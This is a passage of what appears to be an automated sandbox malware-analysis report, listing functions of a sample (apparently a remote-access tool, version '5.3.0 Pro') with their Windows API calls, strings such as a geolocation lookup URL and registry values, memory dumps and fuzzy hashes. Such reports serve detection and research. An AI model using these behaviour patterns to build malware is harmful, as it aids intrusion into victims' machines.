                                                                                                                                                                                                                                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                                                                                                                                              • API String ID: 3121278467-91888290
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8f795feb2c2c8638770b879f68bef916faacce851a21bec1994d5c254bcd5bc8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f795feb2c2c8638770b879f68bef916faacce851a21bec1994d5c254bcd5bc8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                                                                                                                                                                                                                                                                                              Function 1002179D Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100217BA: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 12ea8003082ad6d35e98aca4d0b5426a3542ad57bdfd87ce099fb582a96701cb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC012D1EA4928239AB11D6B43CC2AFB5FD8DB772E0BE00796F501C7093DDA1890693F1
                                                                                                                                                                                                                                                                                                                              Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                                              • String ID: HgF$pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 1818849710-3662775637
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7cfea47274167a91e988394754199870f798ba3a3db882c89e5ca384db410a67
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cfea47274167a91e988394754199870f798ba3a3db882c89e5ca384db410a67
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                                                                                                                                                              Function 10002B20 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 10002BF2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                                                                              • String ID: /json$GET$WebClient/1.0$localhost
                                                                                                                                                                                                                                                                                                                              • API String ID: 856020675-4094957224
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 91aef2c0181b5b02629918c2efa78feadcfe58d8f36eafdb9b4bf9d8472914fd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6761C470A00259ABFB11EFA4CC99FEEBBB8FF05380F20811AF505A7195DB746905CB61
                                                                                                                                                                                                                                                                                                                              Function 100076D0 Relevance: 7.6, APIs: 5, Instructions: 141processCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(?,0000022C), ref: 1000784F
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 10007861
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1789362936-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b5f9529bc68e5f43a8c9d0d07784ed0299af8f37de83bfebd2b618c998394f86
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d2bc65c811ca1ef7753ae95508b0a0770518ab985600e5889df07c8cfc886717
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5f9529bc68e5f43a8c9d0d07784ed0299af8f37de83bfebd2b618c998394f86
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3751B272D04219DBEB20CF98C888BAEB7F5FB48790F218259E81DA7384DB755D45CB90
                                                                                                                                                                                                                                                                                                                              Function 1002175E Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4dfc22582bc64b54c20ad08069fe92d14ded4e54327acf5c4b826402577880af
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E214B2E50C2C26FEB11CBB46C817E66FE8CB772A0F654696E440CB143DDA95846D3B2
                                                                                                                                                                                                                                                                                                                              Function 10007A40 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?), ref: 10007A5B
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 10007A6C
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF), ref: 10007AB8
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AC4
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AD2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3664964396-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1c9cee4698dd12d9c6f9fbc702e91760a2e2c8769d39cee738bd46e8f50a0180
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A211C431B00310BBF7309F689C89F5A77ACFB867A0F200549F90A972D1D7B45A41C7A2
                                                                                                                                                                                                                                                                                                                              Function 0283C7E6 Relevance: 7.6, APIs: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(0283C7DD), ref: 0283C7E6
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,0283C7DD), ref: 0283C838
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0283C860
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283C803: GetProcAddress.KERNEL32(00000000,0283C7F4), ref: 0283C804
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0283C7F4,0283C7DD), ref: 0283C816
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2080333215-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 772343112bc3ddc3b2d341a99a98e217c2af9071bc9a07fc58589731683e2b01
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB01640C9452403CAB2366780C04ABA7F989B27768B181B97E118F7193CBA08302C3F7
                                                                                                                                                                                                                                                                                                                              Function 100217BA Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2152742572-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 73f11cf717d891ec8680d3d8ccba2c06736fe3b4cafecf77f1fc2b5b54d6cdbe
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF0C24EA4924239EA21C5B43C82AFB4FDCCB771A0BA00A52F500C7183DC95890A93F1
                                                                                                                                                                                                                                                                                                                              Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00445369,00446B52,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F58
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446FB4
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                                                                                                                                                                                                                              Function 10006220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 1000634E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1866107781
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 15d45520dd525af8553babc3ba79aa9da1bd519a980773528a1e8930c28a5241
